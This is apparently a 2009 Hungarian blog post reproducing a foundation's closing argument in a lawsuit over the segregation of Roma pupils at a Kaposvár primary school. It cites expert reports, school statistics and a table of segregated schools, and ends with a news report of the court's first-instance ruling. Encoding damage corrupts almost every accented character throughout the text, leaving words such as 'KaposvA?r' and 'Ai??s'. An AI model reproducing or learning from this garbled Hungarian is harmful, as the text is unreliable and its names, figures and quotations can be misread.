KaposvA?r – perbeszAi??d

2009. november 30. hétfő, 20:49Ujlaky András

1


KaposvA?r – perbeszAi??d


Hagyjuk-e, tűrjük-e, véreim, cigányok, / Hogy erőt vegyenek ezek a zsiványok? / Eltöröljék a föld színéről fajunkat, / Kordovány bőrünket, fekete hajunkat? (Arany János)

ForrA?s: CFCF

Dr. Farkas Lilla A?gyvAi??d asszonnyal a miskolci Ai??s a hajdA?hadhA?zi szegregA?ciA?s perek utA?n KaposvA?ron is nyertek a cigA?ny gyerekek

Dr. Farkas Lilla A?gyvAi??d asszonnyal a miskolci Ai??s a hajdA?hadhA?zi szegregA?ciA?s perek utA?n KaposvA?ron is nyertek a cigA?ny gyerekek

Tisztelt Somogy Megyei BAi??rA?sA?g!

Az EsAi??lyt a HA?trA?nyos HelyzetAi?? Gyerekeknek AlapAi??tvA?ny a kaposvA?ri PAi??csi A?ti iskolA?ba jA?rA? cigA?ny/gyerekek intAi??zmAi??nyi szintAi?? szegregA?ciA?ja miatt indAi??tott polgA?ri pert a fenntartA? ellen.

A fenntartA?nak rA?hatA? fel:

  • a beiskolA?zA?si kAi??rzethatA?rral kapcsolatos dAi??ntAi??se, mely az egAi??sz cigA?nytelepet egy iskolA?hoz kapcsolja, amelybe a cigA?ny gyerekeket fel kell venni, szegregA?ciA?t okoz.
  • cigA?ny gyerekek jA?rnak mA?s iskolA?kba is KaposvA?ron, de csupA?n a PAi??csi A?ton teszi hozzA?fAi??rhetAi??vAi?? a cigA?ny etnikai kisebbsAi??gi nevelAi??s-oktatA?st.
  • 2006. jA?nius 15-Ai??n esAi??lyegyenlAi??sAi??gi tervet fogadott el a fogyatAi??kkal Ai??lAi?? gyermekek valamennyi kaposvA?ri iskolA?ban megvalA?sAi??tandA? integrA?lt oktatA?sA?nak biztosAi??tA?sa Ai??rdekAi??ben, ugyanilyen lAi??pAi??seket a cigA?ny gyerekek integrA?ciA?ja Ai??rdekAi??ben nem tett.
  • Itt a tAi??bbi kaposvA?ri iskolA?hoz kAi??pest alacsonyabb minAi??sAi??gAi?? oktatA?st nyA?jt, s alacsony osztA?ly lAi??tszA?mokkal, Ai??s Ai??vfolyamonkAi??nt csupA?n egy-egy osztA?llyal mAi??kAi??dtetik az iskolA?t mindezek nemcsak jogilag, de szakmailag Ai??s gazdasA?gilag is indokoljA?k az iskola felszA?molA?sA?t, Ai??s a cigA?ny gyerekeket tAi??bb mA?s vA?rosi iskolA?ban valA? integrA?lt oktatsA?t.

KAi??sAi??bb a fenntartA? mAi??gis csak mA?dosAi??totta a beiskolA?zA?si kAi??rzetet, kAi??t Ai??zben is, ami az alA?bbiak miatt lA?tszatintAi??zkedAi??s volt csupA?n:

1. Vajon miAi??rt esik egybe jelen per megindAi??tA?sA?val?Ai??Ai?? 2008. jA?liusA?ban KaposvA?r vAi??gre megalkotta a kAi??zoktatA?si esAi??lyegyenlAi??sAi??gi tervAi??t, Ai??s mA?dosAi??totta a PAi??csi A?ti iskola kAi??rzethatA?rA?t A?gy, hogy a Nap Ai??s a Hold utcA?t kAi??t mA?sik vA?rosi iskolA?hoz csatolta.Ai?? MiAi??rt kellett a perig vA?rni vele, miAi??rt nem intAi??zkedett korA?bban a vA?ros, amikor pedig az iskola beszA?molA?ibA?l Ai??s a fenntartA?i ellenAi??rzAi??sbAi??l tudta, hogy az iskola mA?r a 90-es Ai??vekben elcigA?nyosodott?

2. Vajon miAi??rt vA?lasztotta a szA?lAi??k tA?jAi??koztatA?sA?nak eszkAi??zAi??A?l az internetes kAi??zzAi??tAi??telt, amikor kAi??ztudomA?sA? tAi??ny, hogy az olyan populA?ciA?t Ai??rintett, amelynek nemhogy itnernetes hozzA?fAi??rAi??se, de szA?mAi??tA?gAi??pe sincs? -azAi??rt hogy a roma szA?lAi??k mAi??gse vigyAi??k A?t a gyerekeiket?
De a legfAi??bb kAi??rdAi??s:vajon miAi??rt kAi??nyszerA?lt az Ai??nkormA?nyzat a kAi??rzethatA?r mA?dosAi??tA?sra? A vA?lasz: az esAi??lyegyenlAi??sAi??gi terv szerint tA?l sok halmozottan hA?trA?nyos helyzetAi?? gyerek jA?rt ill. tartozott kAi??rzetileg a PAi??csi A?ti iskolA?ba, ezAi??rtajA?nlotta a kAi??rzethatA?r mA?dosAi??tA?st.

3. MA?sodik lAi??pcsAi??ben a Hajnal Ai??s a Csillag utcA?k kerA?ltek ki a PAi??csi u. Iskola kAi??rzetAi??bAi??l. ArrA?l a kAi??t utcA?rA?l van szA?, amelyekben a legkevesebb lakA?hA?z van, Ai??s mAi??g kevesebb iskolA?skorA? gyerek.

PapAi??ron a kAi??rzetek tehA?t megfelelAi??en nAi??ztek ki, de nAi??zzA?k a valA?sA?got: mit A?zent a KodA?ly igazgatA?ja (akihez immA?r a Hold utcai cigA?nygyerekek tartoznak)a cigA?ny szA?lAi??knek a helyi mAi??diA?ban:

ai??zai??i?? a KodA?ly iskola igazgatA?ja azt mondta: hogy megfeleljen valamennyi tAi??rvAi??nyi elAi??Ai??rA?snak a vA?ros, a lehetAi?? legkorrektebb dAi??ntAi??st hozta. A KodA?ly iskolA?ban mindenkinek helye van, aki elfogadja a hA?zirendben rAi??gzAi??tett szabA?lyokat, Ai??s aki meg tud felelni a tantA?rgyi kAi??vetelmAi??nyeknek. Ugyanakkor a PAi??csi utcai iskola pedagA?giai programja kivA?lA?an segAi??ti a halmozottan hA?trA?nyos helyzetAi?? gyerekek kAi??pzAi??sAi??t, sokkal tAi??bb lehetAi??sAi??get biztosAi??t szA?mukra, mint a KodA?ly.
Nem tartok attA?l, hogy az intAi??zkedAi??s kAi??vetkeztAi??ben visszariadnA?nak a [tAi??bbsAi??gi ai??i?? felperes megjegyzAi??se] szA?lAi??k az iskolA?nktA?l. NA?lunk emelt szintAi?? kAi??pzAi??s folyik, s ennek nem csupA?n tantA?rgyi, de anyagi vonzata is van. MAi??rlegelni kell a szA?lAi??knek, hogy fel tudjA?k-e vA?llalni ezeket a tAi??bbletterheket, ugyanis sem a hA?zirendA?nkAi??n, sem a pedagA?giai programunkon nem vA?ltoztatunk – tette hozzA?.ai??? (Sonline, 2008. jA?nius 11.)

MiAi??rt nem azt A?zente az igazgatA?, szeretettel vA?rja a kAi??rzet A?j tanulA?it? Ai??s a fenntartA? miAi??rt nem hatA?rolA?dott el ettAi??l az igazgatA?i A?zenettAi??l? Ehelyett inkA?bb beA?s nyelvAi?? cigA?ny kisebbsAi??gi kAi??pzAi??st indAi??tott be a PAi??csi A?ti iskolA?ban, ahovA? tAi??bbsAi??gAi??ben egyAi??bkAi??nt lovA?ri Ai??s magyar anyanyelvAi?? cigA?ny gyerekek jA?rnak ai??i?? az ui. KaposvA?ron kAi??ztudott, hogy a beA?sok gyerekei a BartA?kban tanulnak-tanultak. De miAi??rt nem indAi??totta a KodA?lyban ai??i?? hogy a cigA?ny gyerekek A?tszokA?sA?t Ai??s beilleszkedAi??sAi??t segAi??tse?

A kAi??rzethatA?r mA?dosAi??tA?s titokban tartA?sa Ai??s a status quo-hoz valA? ragaszkodA?s a szegregA?ciA?t tartjA?k fenn. Mint ahogy az adatokkal valA? trA?kkAi??zAi??s is, ai??i?? ahogy az a fenntartA?, a kirendelt szakAi??rtAi??, a szociolA?gus kutatA?k Ai??s a kAi??zoktatA?si informA?ciA?s rendszer adatainak Ai??sszevetAi??sAi??bAi??l egyAi??rtelmAi??en megA?llapAi??thatA??

Havas GA?bor szakvAi??lemAi??nyAi??ben (9. o.) Ai??sszegzi is az ismerhetAi?? adatokat: ai??zai??i??egyAi??rtelmAi??, hogy a PAi??csi A?ti iskola HHH adatai nem felelnek meg a valA?sA?gnak. Az iskola beszA?molA?ja szerint a szA?lAi??k tAi??bbsAi??ge legfeljebb 8 A?ltalA?nos vAi??gzettsAi??ggel rendelkezik, vagy mAi??g annyival sem. A kaposvA?ri AntiszegregA?ciA?s Tervnek a 2001-es nAi??pszA?mlA?lA?sbA?l szA?rmazA? adatai szerint a szentjakabi telepen Ai??lAi?? munkakAi??pes korA?ak 80 szA?zalAi??kA?nak akkor nem volt 8 A?ltalA?nosnA?l magasabb iskolai vAi??gzettsAi??ge. Ennek ellenAi??re a KEH szerint a tanulA?knak csak kevesebb, mint 25 szA?zalAi??ka HHH. A 2008/2009-es tanAi??v statisztikA?jA?ban (Kirstat) ugyan ennAi??l magasabb arA?ny (32,4%) szerepel, de a fentiek alapjA?n ez sem reA?lis adat.ai???

A PAi??csi A?ti iskolA?ban a gyerekek nagyobb rAi??szAi??tAi??l nincs nyilatkozat a HHH stA?tuszukra nAi??zve, pedig annak nagy jelentAi??sAi??ge lenne a csalA?dok tA?mogatA?sA?t illetAi??en. Az iskola nem tA?jAi??koztatta ennek fontossA?gA?rA?l a szA?lAi??ket Ai??s nem gyAi??jtAi??tte be azokat, pedig ahogyan a per elejAi??n az iskola fennmaradA?sA?t tA?mogatA? szA?lAi??i alA?Ai??rA?sokat -ugyanA?gy ezeknek a nyiltakozatoknak a beszerzAi??se is kAi??nnyAi?? lett volna. FAi??leg hogy A?llAi??tA?suk szerint az iskolA?nak kiemelkedAi?? kapcsolata van a szA?lAi??kkel.Ai?? Pontosan tudhatA?, hogy amennyiben valA?s adatok A?llnA?nak rendelkezAi??sre a HHH stA?tuszrA?l a PAi??csi A?ti iskolA?t be kellene zA?rni

A kAi??zoktatA?si tAi??rvAi??nybAi??l (66. Ai??) egyAi??rtelmAi??, hogya kAi??rzethatA?r mA?dosAi??tA?snak az a cAi??lja, hogy az iskolai HHH arA?nyok kAi??zAi??tti kA?lAi??nbsAi??get minimalizA?lja. De haAi?? az elcsatolt utcA?kbA?l a HHH gyerekek visszajA?rnak a PAi??csi A?tiba, mert a az A?j iskolA?kban nem vA?rjA?k Ai??ket tA?rt karokkal, akkor mi Ai??rtelme volt?

Havas GA?bor Ai??s LiskA? Ilona 2005-ben az OktatA?si MinisztAi??rium megbAi??zA?sA?bA?l elkAi??szAi??tettAi??k a szegregA?lt cigA?ny A?ltalA?nos iskolA?k listA?jA?t. FelmAi??rtAi??k az itt folyA? oktatA?s kAi??rA?lmAi??nyeit. (Havas GA?bor Ai??s LiskA? Ilona, 2005: SzegregA?ciA? a roma tanulA?k A?ltalA?nos iskolai oktatA?sA?ban, 2005, FelsAi??oktatA?si KutatA?intAi??zet, Budapest.) A BevezetAi??ben (5. o.) ezt Ai??rtA?k:

2000-es kutatA?sunk sorA?n kiderA?lt, hogy az A?ltalA?nos iskolA?k igen nagy hA?nyadA?ban tartA?san elkA?lAi??nAi??tett (szegregA?lt) formA?ban oktatjA?k a roma tanulA?kat, az A?tlagosnA?l rosszabb szemAi??lyi Ai??s tA?rgyi feltAi??telek mellett, olyan oktatA?si programok Ai??s pedagA?giai mA?dszerek felhasznA?lA?sA?val, amelyektAi??l nem remAi??lhetAi?? sikeres felzA?rkA?ztatA?suk, tanulmA?nyi teljesAi??tmAi??nyA?k javulA?sa, Ai??s tA?rsadalmi beilleszkedAi??sA?k eredmAi??nyessAi??ge.
RAi??szben a kutatA?s sorA?n elemzett adatok gyAi??ztAi??k meg az oktatA?si kormA?nyzatot arrA?l, hogy vA?ltoztassanak a roma tanulA?k oktatA?sA?ra szA?nt kiegAi??szAi??tAi?? tA?mogatA?sok elosztA?si elvein ai??i??

Az 1999/2000-es tanAi??v A?ta 126-rA?l 178-ra, vagyis nagyjA?bA?l mA?sfAi??lszeresAi??re nAi??tt azoknak az iskolA?knak a szA?ma, ahol a roma tanulA?k tAi??bbsAi??get alkotnak.ai???

A 2004-es kutatA?sban szereplAi??, Ai??s azA?ta is fennA?llA? nagyvA?rosi szegregA?lt iskolA?k listA?jA?ban a a PAi??csi A?tit csak a VIII kerA?leti gettA?iskola elAi??zi meg, 97,7Ai?? 2.helyenAi?? 93,2%.-KaposvA?ri cigA?nyiskola.

Budapest IV. Lenglet 59,9
Budapest IX. Mester u. 67. 87
Budapest VII. HernA?d utca 66,6
Budapest VIII. Dugonics u. 90,6
Budapest VIII. ErdAi??lyi u. 97,7
Budapest VIII. NAi??met u. 59
Budapest VIII. PrA?ter u. 57,9
Budapest X. MA?V telep 72,6
Budapest XX. KA?lmA?n u. 61,3
Eger Iskola u. 59,9
GyAi??r Kossuth L. u. 66,1
HajdA?bAi??szAi??rmAi??ny Esze T. 71,7
Heves Hunyadi u. 56,9
KaposvA?r PAi??csi u. 93,2
Karcag Arany J. u. 55,8
Karcag ZA?dor u. 60,9
Kazincbarcika MA?jus 1. u. 75,6
SalgA?tarjA?n PetAi??fi u. 69,7
Szentes BerekhA?t u. 80,5
TatabA?nya Iskola u. 80
TiszaA?jvA?ros DA?zsa Gy. u. 74

A t. Megyei BAi??rA?sA?g elAi??tt hosszas Ai??s kimerAi??tAi?? polAi??mia folyt a kirendelt oktatA?si szakAi??rtAi?? Ai??s a felperes kAi??zAi??tt az oktatA?si szinvonalbeli kA?lAi??nbsAi??grAi??l. Nem kAi??vA?nom ezt A?jra rAi??szletezni, hogy a kirendelt szakAi??rtAi?? A?gy Ai??rta mg szakAi??rtAi??i jelentAi??sAi??t, hogy elmulasztotta az adatok elemzAi??sAi??t, az iskolA?k meglA?togatA?sA?tAi??Ai?? hogy A?rA?kat nem lA?togatott Ai??s a szA?lAi??kkel nem beszAi??lt, hogy sajA?tos mA?don Ai??rtelmezi a kompetenciamAi??rAi??sek eredmAi??nyeitAi?? SajA?t maga minAi??sAi??ti le az iskola szAi??nvonalA?t akkor, amikor azt magyarA?zza, hogy szerinte KaposvA?rnak ezen iskolA?jA?t nem a vA?rosi iskolA?khoz kell hasonlAi??tani, hanem a vidAi??kiekhez.
Megjegyezni kAi??vA?nom itt mAi??g, hogy a szakAi??rtAi?? A?r nov. 4.-Ai??n arra utalt a RA?diA? C mAi??sorA?ban hogy az elkA?lAi??nAi??tAi??s fenntartA?sA?val cigA?ny gyerekeket az Ai??nkormA?nyzat megvAi??di a tAi??bbsAi??gi tA?rsadalomtA?l, akik A?gysem fogadnA?k be Ai??ket, de ha mAi??gis akkor sem javulnA?nak meg a romA?k: „nagyon jA?l tudjuk, hogy a cigA?nyok mA?sodrendAi?? A?llampolgA?rok nagyon sok ember szemAi??ben”(…) Hogyha a tAi??bbi iskolA?ba jA?rnak ezek a gyerekek, akkor, ahogy ebben az orszA?gban sok helyen pAi??lda volt mA?r rA?, a gyerekek ottlAi??te Ai??ppensAi??ggel nem a legpozitAi??vabb hozzA?A?llA?st vA?ltotta ki”. „attA?l, hogy egy gyerek mA?sik iskolA?ba jA?r, attA?l mAi??g Ai?? nem lesz mA?s”.

Mivel Hepp JA?zsef vAi??lemAi??nye kevAi??sbAi?? volt hasznA?lhatA?, a pedagA?gusok munkA?jA?val kapcsolatban sem, a Commitment PedagA?giai IntAi??zet szakAi??rtAi??i jelentAi??se sokkal informatAi??vabb. Ez kiemeli, hogy a tanulA?s tanAi??tA?sA?val Ai??s a kooperatAi??v, valamint a differenciA?lt technikA?k alkalmazA?sA?val kapcsolatban volt Ai??rzAi??kelhetAi?? hiA?nyossA?g. MA?rpedig ezek nem csupA?n a cigA?ny/HHH gyerekek, hanem valamennyi gyerek oktatA?sA?hoz elengedhetetlenek a mai vilA?gban. Az esAi??lyegyenlAi??sAi??gi terv alapjA?n Havas GA?bor is Ai??sszegyAi??jtAi??tte a pedagA?gusok mA?dszertani felkAi??szA?ltsAi??gAi??vel kapcsolatban rendelkezAi??sre A?llA? adatokat (szakvAi??lemAi??nye 11-12. oldalA?n ):ai??zai??i?? a KEH szerint az iskola pedagA?gusai feltAi??nAi??en kis szA?mban vettek rAi??szt azokban a SuliNova (Educatio) kAi??nA?lta tovA?bbkAi??pzAi??si programokban, amelyek a pedagA?giai eszkAi??ztA?r, a korszerAi?? mA?dszertani ismeretek bAi??vAi??tAi??sAi??vel elsAi??sorban a HH Ai??s HHH gyermekek hatAi??konyabb oktatA?sA?t kAi??vA?njA?k elAi??segAi??teni. Az ebbAi??l a szempontbA?l talA?n legfontosabb tovA?bbkAi??pzAi??si programban (EgyAi??ni haladA?si A?temet segAi??tAi?? differenciA?lt oktatA?s) a PAi??csi A?ti iskolA?bA?l csak egyetlen egy, ugyanakkor a kaposvA?ri iskolA?k tAi??bbsAi??gAi??bAi??l lAi??nyegesen tAi??bb pedagA?gus vett rAi??szt. HasonlA? a helyzet a KooperatAi??v tanulA?s elnevezAi??sAi?? tovA?bbkAi??pzAi??si programmal. A HHH gyermekek oktatA?sA?hoz kA?lAi??nAi??sen ajA?nlott, Ai??sszesen Ai??t modult tartalmazA? programcsomagra Ai??pA?lAi?? tovA?bbkAi??pzAi??seken rAi??szt vett pedagA?gusok szA?mA?t tekintve a PAi??csi A?ti iskola hA?tulrA?l harmadik, holott, mint tudjuk, a HHH gyermekek arA?nyA?t tekintve ez az iskola az elsAi??. Hepp JA?zsef A?rA?kat nem lA?togatott. Jelezte azt is, hogy a rA? bAi??zott szakAi??rtAi??i munka teljesAi??tAi??sAi??hez ezt nem tartotta szA?ksAi??gesnek. Holott Ai??ppen az A?ralA?togatA?sok rAi??vAi??n szerezhetett volna legalA?bb benyomA?sokat arrA?l, hogy a hozzA?adott Ai??rtAi??k vonatkozA?sA?ban hogyan teljesAi??t az iskola. Ugyanis elsAi??sorban az A?ralA?togatA?sok rAi??vAi??n derA?lhet ki, hogy a pedagA?gusok mA?dszertani felkAi??szA?ltsAi??ge megfelelAi??-e, Ai??s az A?rai munka sorA?n megteszik-e mindazt, ami a speciA?lis kAi??rA?lmAi??nyeket figyelembe vAi??ve szakmailag elvA?rhatA?.ai???

MegA?llapAi??thatA? tehA?t, hogy a kirendelt szakAi??rtAi??

1.Ai??Ai??Ai?? a szakvAi??lemAi??nyAi??ben nem a fenntartA?i felelAi??ssAi??get vizsgA?lta, hanem az iskolA?Ai??t,
2.Ai??Ai??Ai?? A?gy Ai??rtAi??kelte az iskola tevAi??kenysAi??gAi??t, mintha ott 2008-ban indult volna meg a fejlesztAi?? munka,
3.Ai??Ai??Ai?? az adatok elemzAi??sAi??t elmulasztotta, amely mulasztA?sA?nak mAi??rtAi??ke a Havas GA?bor szerint igen jelentAi??snek mutatkozik, Ai??s vAi??gA?l, hogy
4.Ai??Ai??Ai?? nem oldotta fel a szakvAi??lemAi??nye Ai??s az esAi??lyegyenlAi??sAi??gi terv kAi??zAi??tt a PAi??csi A?ti iskolA?ra vonatkozA? ellentmondA?st, sAi??t, totA?lisan figyelmen kAi??vA?l hagyta azt. Az esAi??lyegyenlAi??sAi??gi terv uis intAi??zmAi??nyA?tszervezAi??st tart szA?ksAi??gesnek, ha nem mutatkozik javulA?s a kompetencia mAi??rAi??si eredmAi??nyekben.

Havas GA?bor szakvAi??lemAi??nyAi??bAi??lAi?? szA?ksAi??ges mAi??gAi?? kiemelni: ai??zai??i?? a tanulA?lAi??tszA?m Ai??s az egy tanulA?ra jutA? fajlagos kAi??ltsAi??gek kAi??zAi??tt szoros Ai??sszefA?ggAi??s van. Ugyanolyan szAi??nvonalA? szolgA?ltatA?s tAi??bbe kerA?l, ha kisebb a tanulA?lAi??tszA?m. A PAi??csi A?ti a vA?ros legkisebb lAi??tszA?mA? iskolA?ja. A 2007/2008-as tanAi??vben 167 tanulA?ja volt, mAi??g a tAi??bbi iskola lAi??tszA?mA?nak A?tlaga 345 volt. Az egy tanulA?ra jutA? tA?mogatA?s Ai??sszegAi??nek iskolA?nkAi??nti kA?lAi??nbsAi??gei jelentAi??s mAi??rtAi??kben erre vezethetAi??k vissza. EzAi??rt nem tartom megalapozottnak Hepp JA?zsefnek azt a kAi??vetkeztetAi??sAi??t sem, miszerint ai??zaz intAi??zmAi??ny mAi??kAi??dAi??sAi??t pozitAi??v diszkriminA?ciA?val kezeli a fenntartA?, a tAi??bbi iskolA?hoz kAi??pest jobb anyagi Ai??s Ai??gy tA?rgyi feltAi??telek kAi??zAi??tt tanulhatnak.ai??? ai??i??

Hepp JA?zsef szakvAi??lemAi??nyAi??ben leszAi??gezi: ai??zSzakAi??rtAi??i vizsgA?latom alapjA?n megA?llapAi??tottam, hogy a vizsgA?lt iskolA?ban kiemelt (ValA?szAi??nAi??leg kiemelkedAi??t akart Ai??rni. H.G.) a nevelAi??s Ai??s oktatA?s szAi??nvonalaai??i??ai??? Ezt azonban semmivel sem tA?masztja alA?, vAi??lemAi??nyAi??t nem indokolja. Ai??mlesztve kAi??zAi??l ugyan szA?mos tA?blA?zatot, kimutatA?st, de ezeket nem elemzi, nem tA?r fel belAi??lA?k olyan Ai??sszefA?ggAi??seket, amelyek a fenti vAi??lemAi??nyt alA?tA?masztanA?k. Viszont azok a mutatA?k, amelyeket az oktatA?si esAi??lyegyenlAi??sAi??gi helyzetelemzAi??sekben a nevelAi??s Ai??s oktatA?s hatAi??konysA?gA?nak a mAi??rAi??sAi??re hasznA?lnak, egyA?ltalA?n nem igazoljA?k a szakAi??rtAi??t. ai??i??

ai??i?? [a kompetencia mAi??rAi??sben]Ai?? A PAi??csi A?ti iskola nem egyszerAi??en utolsA? a rangsorban, tanulA?inak teljesAi??tmAi??nyAi??t szakadAi??k vA?lasztja el a tAi??bbi iskolA?Ai??tA?l. SzAi??vegAi??rtAi??si kAi??pessAi??gA?k szintje gyakorlatilag kizA?rja a tovA?bbi eredmAi??nyes iskolA?ztatA?s lehetAi??sAi??gAi??t. Ez a szAi??lsAi??sAi??ges lemaradA?s a tanulA?k iskolA?nkAi??nti tA?rsadalmi Ai??sszetAi??telAi??ben mutatkozA? jelentAi??s kA?lAi??nbsAi??gek ismeretAi??ben is elfogadhatatlan.
KAi??zismert, hogy ma mA?r az A?ltalA?nos iskolA?t befejezAi?? tanulA?k kAi??zel 80 szA?zalAi??ka Ai??rettsAi??git adA? kAi??zAi??piskolA?ban folytatja tanulmA?nyait s hogy a szakiskolai kAi??pzAi??s sA?lyos vA?lsA?ggal kA?zd, tAi??bbek kAi??zAi??tt azAi??rt, mert az oda beiskolA?zottak jelentAi??s hA?nyada az alapvetAi?? Ai??rA?si, olvasA?si, szAi??vegAi??rtAi??si, szA?molA?si kAi??szsAi??geket sem sajA?tAi??totta el. A szakiskolA?ba jA?rA?k kAi??rAi??ben igen nagy a lemorzsolA?dA?s, Ai??s a kAi??sAi??bbi elhelyezkedAi??si esAi??lyek is nagyon rosszak. Ai??sszefoglalva: a szakiskolA?ba kerA?lAi??s jelentAi??sen nAi??veli a halmozottan hA?trA?nyos helyzet A?jratermelAi??sAi??nek valA?szAi??nAi??sAi??gAi??t.
Mindezt figyelembe vAi??ve a PAi??csi A?ti iskola tovA?bbtanulA?si mutatA?i [85% tanul tovA?bb szakiskolA?ban] a tAi??bbi kaposvA?ri iskolA?Ai??val Ai??sszevetve nem nevezhetAi??k mA?snak, mint katasztrofA?lisnak. ai??i??

Ha csak a tAi??bbi kaposvA?ri iskolA?t vesszA?k figyelembe, akkor az Ai??rettsAi??git adA? kAi??zAi??piskolA?ban valA? tovA?bbtanulA?si arA?nyokat illetAi??en a legrosszabbat (BartA?k) a legjobbtA?l (Kinizsi) 25 szA?zalAi??k vA?lasztja el. A PAi??csi A?ti iskola viszont 50 %-os lemaradA?sban van mAi??g a BartA?khoz kAi??pest is.

Hepp JA?zsef szakvAi??lemAi??nyeiben tAi??bbszAi??r hivatkozik arra, hogy a PAi??csi A?ti iskola mutatA?it nem mAi??ltA?nyos a tAi??bbi kaposvA?ri iskolA?Ai??hoz viszonyAi??tani. Szerinte sokkal reA?lisabb Ai??sszehasonlAi??tA?si alapot kAi??nA?lnak azok a falusi iskolA?k, ahol zAi??mmel HH Ai??s HHH gyerekek tanulnak. Ezt az Ai??rvelAi??st elfogadhatatlannak tartjuk!,
JA? pAi??da erre a kaposvA?ri iskolA?k kAi??zA?l pAi??ldA?ul a ToponA?ri,amelyAi?? inkA?bb minAi??sAi??thetAi?? falusi iskolA?nak, hiszen egy kAi??zigazgatA?silag ugyan KaposvA?rhoz csatolt, de terA?letileg elkA?lAi??nA?lAi?? falusias telepA?lAi??srAi??sz kisiskolA?ja. Ugyanakkor mAi??g ez az iskola is 51 szA?zalAi??kkal jobb tovA?bbtanulA?si mutatA?t produkA?l.
De egy mA?sik, 2004-es vizsgA?lat (LA?sd Havas-LiskA?: SzegregA?ciA? a roma tanulA?k A?ltalA?nos iskolai oktatA?sA?ban, FelsAi??oktatA?si KutatA?intAi??zet) 553 zAi??mmel magas cigA?ny arA?nyA? Ai??s falusiAi?? A?ltalA?nos iskolA?ra kiterjedAi?? vizsgA?lat (kimutatta, hogy mA?r 2003-ban 20 szA?zalAi??k fAi??lAi??tt volt az Ai??rettsAi??git adA? kAi??zAi??piskolA?ban tovA?bbtanulA? romA?k arA?nya. A PAi??csi A?ti iskola tovA?bbtanulA?si arA?nyok tekintetAi??ben mAi??g a legrosszabb helyzetAi?? falusi gettA?sodA? iskolA?k 5 Ai??vvel korA?bbi eredmAi??nyeivel sem A?llja ki az Ai??sszehasonlAi??tA?st.
SA?lyosbAi??tja a helyzetet hogyAi?? KaposvA?r iskolA?i kAi??zA?l a PAi??csi A?ti volt az egyetlen, ahol jelentAi??s szA?mban voltak olyan vAi??gzAi??s tanulA?k, akik egyA?ltalA?n nem tanultak tovA?bb. (2006: 11,1 %; 2007: 5,5 % KEH) ai??i??

ai??i?? Az elmA?lt Ai??vekben tAi??bb olyan orszA?gos segAi??tAi?? programot (AstravalA? program, Arany JA?nos program, Tanoda program) hoztak lAi??tre, amelyek cAi??lja a HH Ai??s HHH gyerekek eredmAi??nyesebb iskolai pA?lyafutA?sA?nak elAi??segAi??tAi??se. Hepp JA?zsef szakvAi??lemAi??nyeiben tAi??bbszAi??r hangot ad annak a vAi??lemAi??nyAi??nek, hogy a PAi??csi A?ti iskolA?tA?l nem lehet csodA?t vA?rni, ehiszen kA?lAi??nlegesen rossz szociA?lis helyzetAi?? HH Ai??s HHH gyerekeket oktat, akikAi??rt erejA?kAi??n felA?l mindent megtesznek. Sajnos nem ez a helyzet. Az AstravalA? Ai??sztAi??ndAi??jprogramban rAi??sztvevAi?? tanulA?k szA?maAi?? minimA?lis. KAi??t olyan kaposvA?ri iskola is van, amely nagyobb arA?nyban segAi??ti hozzA? tanulA?it a programban valA? rAi??szvAi??telhez. Tanoda program nincs, Ai??s a vAi??gzAi??s tanulA?k kAi??zA?l a KEH szerint senki sem kapcsolA?dik be az Arany JA?nos programba.Ai?? Asgy tAi??nik,az iskola mAi??gsem tesz igazA?n komoly erAi??feszAi??tAi??seket annak Ai??rdekAi??ben, hogy a hA?trA?nyok csAi??kkentAi??sAi??t szolgA?lA? esAi??lyteremtAi?? programok kAi??nA?lta lehetAi??sAi??geket tanulA?i Ai??rdekAi??ben kiaknA?zza. ai??i??

A vA?ros kAi??t magas HH arA?nyA? iskolA?jA?ban bevezettAi??k a kompetenciaalapA? oktatA?st, a PAi??csi A?tiban, ahol ez az arA?ny a legmagasabb, azonban nem. Ellenben bevezettAi??k az IPR-t (integrA?lt pedagA?giai rendszer) egy teljes mAi??rtAi??kig szegregA?lt iskolA?ban.

1.Ai??Ai??Ai?? Az adatok arrA?l tanA?skodnak, hogy KaposvA?r vA?rosa az oktatA?si esAi??lyegyenlAi??sAi??g erAi??sAi??tAi??sAi??t nem tartja kAi??vetendAi?? cAi??lnak, ehelyett a tA?rsadalmi kA?lAi??nbsAi??geket felerAi??sAi??tAi??, erAi??sen differenciA?lt kAi??nA?latA? oktatA?spolitikA?t valA?sAi??t meg, mikAi??zben makacsul ragaszkodik a szegregA?lt cigA?nyiskola megtartA?sA?hoz.

Ezt az oktatA?spolitikA?t szolgA?lja ki a szakAi??rtAi??, akinek jelentAi??se mAi??lysAi??ges pedagA?giai fatalizmust tA?krAi??z, aminek indokoltsA?gA?t a kutatA?si adatok cA?foljA?k. Azt sugallja, hogy a HHH gyermekek oktatA?sa terAi??n maximA?lis erAi??feszAi??tAi??ssel Ai??s az Ai??sszes erre a cAi??lra kidolgozott eszkAi??z, mA?dszer, eljA?rA?s, oktatA?spolitikai intAi??zkedAi??s latba vetAi??sAi??vel sem lehet Ai??rdemi javulA?st elAi??rni. Vagyis bele kell tAi??rAi??dni az Ai??rintett tA?rsadalmi rAi??teg vA?ltozatlan, sAi??t bAi??vAi??tett A?jratermelAi??sAi??be.ai???

Ha a szegregA?lt oktatA?s eredmAi??nyeket hozna, akkor termAi??szetesen a jA? 15 Ai??ve szegregA?lt PAi??csi A?ti iskolA?nak kiemelkedAi??en sikeres cigA?ny gyerekeket kellene Ai??vrAi??l-Ai??vre kibocsA?tania. Ennek azonban pont az ellenkezAi??je tAi??rtAi??nik: Ai??vrAi??l Ai??vre nAi??veli az iskola a funkcionA?lis analfabAi??tA?k Ai??s jAi??vendAi??beli munkanAi??lkA?liek szA?mA?t. AlapAi??tvA?nyunk feladata ez ellen kA?zdeni az orszA?gban, ezAi??rt folyt ez a per, Ai??s ennek a helyzetnek a megszA?ntetAi??sAi??t kAi??ri az EsAi??lyt a HA?trA?nyos HelyzetAi?? Gyerekeknek AlapAi??tvA?ny a t. Megyei BAi??rA?sA?gtA?l.

SzegregA?l a PAi??csi utcai A?ltalA?nos

http://index.hu/belfold/2009/11/30/szegregal_a_pecsi_utcai_altalanos/

MegA?llapAi??totta a szegregA?ciA?t a kaposvA?ri PAi??csi utcai A?ltalA?nos Iskola A?gyAi??ben indAi??tott polgA?ri perben a Somogy Megyei BAi??rA?sA?g hAi??tfAi??n elsAi?? fokon meghozott hatA?rozatA?ban, amelynek indoklA?sA?ban arra is kitAi??rt, hogy polgA?rjogi eszkAi??zAi??kkel nem lehet kikAi??nyszerAi??teni az iskola bezA?rA?sA?t.

